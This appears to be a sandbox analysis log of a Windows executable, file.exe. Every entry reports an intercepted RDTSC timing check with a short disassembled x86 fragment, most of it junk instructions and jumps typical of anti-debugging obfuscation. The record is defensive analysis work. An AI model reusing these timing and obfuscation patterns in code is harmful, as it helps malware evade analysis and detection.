Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6425 second address: 4F644D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3D90D93B54h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jne 00007F3D90D93B46h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F644D second address: 4F646A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3D90F37F28h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F646A second address: 4F6487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B53h 0x00000007 ja 00007F3D90D93B4Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5AA9 second address: 4F5AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3D90F37F16h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5AB4 second address: 4F5AC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Ch 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6715 second address: 4F672F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F26h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F672F second address: 4F6737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6894 second address: 4F6898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6C60 second address: 4F6C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F3D90D93B46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6C70 second address: 4F6C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F3D90F37F30h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501807 second address: 501813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501813 second address: 501817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501817 second address: 50181B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50181B second address: 501830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3D90F37F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007F3D90F37F16h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500620 second address: 50062A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3D90D93B46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50062A second address: 500645 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3D90F37F22h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500645 second address: 50064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5008D4 second address: 5008DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5008DC second address: 5008E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5008E3 second address: 500901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F3D90F37F16h 0x00000009 jmp 00007F3D90F37F23h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500B55 second address: 500B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500B5B second address: 500B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500B63 second address: 500BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jno 00007F3D90D93B5Ah 0x0000000d js 00007F3D90D93B4Ch 0x00000013 js 00007F3D90D93B46h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F3D90D93B50h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500CBB second address: 500CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3D90F37F22h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jns 00007F3D90F37F16h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500CE2 second address: 500CEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500E30 second address: 500E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500E34 second address: 500E3E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3D90D93B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500E3E second address: 500E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500E44 second address: 500E4F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501156 second address: 501161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3D90F37F16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501161 second address: 501170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D90D93B4Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5012BE second address: 5012C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5012C3 second address: 5012CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F3D90D93B46h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5012CF second address: 5012D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509E1F second address: 509E31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509E31 second address: 509E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509E37 second address: 509E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509E3B second address: 509E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509E3F second address: 509E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509E47 second address: 509E54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F3D90F37F16h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509725 second address: 50972A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50986B second address: 50986F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50986F second address: 509875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509875 second address: 509899 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F3D90F37F27h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509899 second address: 5098A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3D90D93B46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5099E5 second address: 5099EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5099EB second address: 5099EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5099EF second address: 509A08 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D90F37F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push esi 0x0000000c pushad 0x0000000d jnp 00007F3D90F37F16h 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509B81 second address: 509BA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B59h 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E117 second address: 50E11C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E38C second address: 50E390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E390 second address: 50E39A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E520 second address: 50E524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E524 second address: 50E52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E52A second address: 50E530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E530 second address: 50E53A instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D90F37F1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E67D second address: 50E681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515803 second address: 51580F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51580F second address: 515816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515816 second address: 51581B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514136 second address: 514145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3D90D93B46h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514145 second address: 514149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514558 second address: 514587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B54h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3D90D93B53h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514587 second address: 514590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC4BD second address: 4BC506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F3D90D93B48h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov ebx, dword ptr [ebp+124814EEh] 0x0000002a sub dh, FFFFFFF2h 0x0000002d add eax, ebx 0x0000002f mov cx, 195Ch 0x00000033 nop 0x00000034 jng 00007F3D90D93B6Bh 0x0000003a push eax 0x0000003b push edx 0x0000003c jo 00007F3D90D93B46h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC506 second address: 4BC5A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3D90F37F1Fh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F3D90F37F18h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov edi, eax 0x0000002c push 00000004h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F3D90F37F18h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 mov di, ax 0x0000004b mov dword ptr [ebp+122D2ADBh], ecx 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 push eax 0x00000055 pop eax 0x00000056 jmp 00007F3D90F37F25h 0x0000005b popad 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F3D90F37F1Bh 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514AC7 second address: 514ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514ACB second address: 514ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F3D90F37F1Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514ADB second address: 514AE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514AE8 second address: 514AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514AEC second address: 514B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F3D90D93B46h 0x0000000e jmp 00007F3D90D93B53h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 514B0D second address: 514B11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515554 second address: 51555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51555A second address: 51558E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007F3D90F37F22h 0x0000000b popad 0x0000000c pushad 0x0000000d je 00007F3D90F37F18h 0x00000013 je 00007F3D90F37F1Eh 0x00000019 push ebx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51558E second address: 5155AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3D90D93B56h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5155AD second address: 5155B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517FE4 second address: 517FFA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3D90D93B46h 0x00000008 jp 00007F3D90D93B46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517FFA second address: 518004 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3D90F37F16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518004 second address: 518029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3D90D93B55h 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F3D90D93B46h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518029 second address: 518040 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3D90F37F1Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518168 second address: 518185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90D93B57h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518185 second address: 51819E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push esi 0x00000007 pushad 0x00000008 jmp 00007F3D90F37F1Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51831A second address: 518338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F3D90D93B55h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518662 second address: 51866A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E122 second address: 51E147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3D90D93B46h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F3D90D93B54h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E147 second address: 51E161 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3D90F37F18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F3D90F37F1Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E161 second address: 51E168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E9D1 second address: 51E9F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F3D90F37F18h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F3D90F37F1Ch 0x00000018 pop edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E9F6 second address: 51E9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51EF81 second address: 51EF95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F20h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51EF95 second address: 51EFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F231 second address: 51F236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F53F second address: 51F54B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3D90D93B46h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51FDEB second address: 51FE16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D90F37F1Dh 0x00000008 jmp 00007F3D90F37F23h 0x0000000d jno 00007F3D90F37F16h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51FE16 second address: 51FE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F3D90D93B4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
